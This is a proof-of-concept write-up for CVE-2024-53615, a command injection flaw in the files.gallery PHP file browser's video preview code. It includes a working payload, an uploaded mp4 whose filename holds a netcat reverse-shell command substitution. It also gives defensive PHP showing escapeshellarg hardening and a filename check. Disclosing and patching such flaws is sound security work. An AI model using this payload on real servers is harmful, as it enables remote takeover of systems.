CVE-2024-53615 PoC — Files security vulnerability

Associated Vulnerability
Title: Files security vulnerability (CVE-2024-53615)
Description: Files is a single-file PHP application by the individual developer Karl Ward. It can be dropped into any directory and allows browsing the files and directories within it. Files versions 0.3.0 through 0.11.0 contain a security vulnerability caused by command injection, which allows remote attackers to execute arbitrary code via a crafted video file.
Description
CVE-2024-53615
Readme
# CVE-2024-53615

`files.gallery` contains an RCE vulnerability. Prerequisites:

- `ffmpeg` in `PATH`
- `config.php`: `'allow_upload' => true`
- `exec` must be enabled in PHP config

The vulnerability is in the following line, which generates video previews:

```php
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
```

As `$this->path` is user controllable, we can construct a malicious file whose filename is a bash command substitution. The file must contain e.g. the mp4 magic bytes, and its filename must end with `.mp4`:

```sh
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'
```

If we upload this file and refresh the page so the application loads it, we obtain a shell on our local machine.

Note: the command is stored in the filename, so reverse shell possibilities are limited due to name length constraints.
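As an added defensive example (not code from the files.gallery project or from this PoC), the vulnerable concatenation above is shown beside a hardened form that uses PHP's `escapeshellarg()`, together with an upload-name check; the paths and the sample filename are constructed and nothing is executed.

```php
<?php
// Added example, not part of files.gallery: builds and inspects the command
// strings only; ffmpeg is never invoked.

// Vulnerable form (as in the README): escaping only '"' leaves $(...) and
// backticks live inside the double-quoted argument, so the shell expands
// them before ffmpeg ever sees the path.
function build_cmd_vulnerable(string $ffmpeg, string $path, string $cache): string
{
    return $ffmpeg . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $path)
        . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320"'
        . ' -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
}

// Hardened form: escapeshellarg() wraps each value in single quotes and
// escapes embedded single quotes, so no expansion happens whatever the
// filename contains.
function build_cmd_hardened(string $ffmpeg, string $path, string $cache): string
{
    $vf = 'thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320';
    return escapeshellarg($ffmpeg) . ' -ss 3 -t 1 -hide_banner -i ' . escapeshellarg($path)
        . ' -frames:v 1 -an -vf ' . escapeshellarg($vf)
        . ' -r 1 -y -f mjpeg ' . escapeshellarg($cache) . ' 2>&1';
}

// Upload gate (assumed policy): allow only a conservative character set and
// refuse names starting with '-' so they can never be read as an option.
function filename_is_safe(string $name): bool
{
    return preg_match('/^[A-Za-z0-9._-]+$/', $name) === 1 && !str_starts_with($name, '-');
}

// Constructed sample: a command substitution with a harmless body.
$path  = '/var/www/files/$(echo injected).mp4';
$cache = '/var/www/_files/cache/thumb.jpg';

echo "vulnerable: " . build_cmd_vulnerable('ffmpeg', $path, $cache) . "\n";
echo "hardened:   " . build_cmd_hardened('ffmpeg', $path, $cache) . "\n";
var_dump(filename_is_safe(basename($path)));
var_dump(filename_is_safe('holiday_2024.mp4'));
```

The hardened command still relies on `exec` being available; disabling it via `disable_functions` where previews are not needed removes the sink entirely.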
File Snapshot

```
[4.0K] /data/pocs/ad0103e8a0a069644be3a84634af226f17509757
├── [2.0K] exploit.py
└── [1.1K] README.md

0 directories, 2 files
```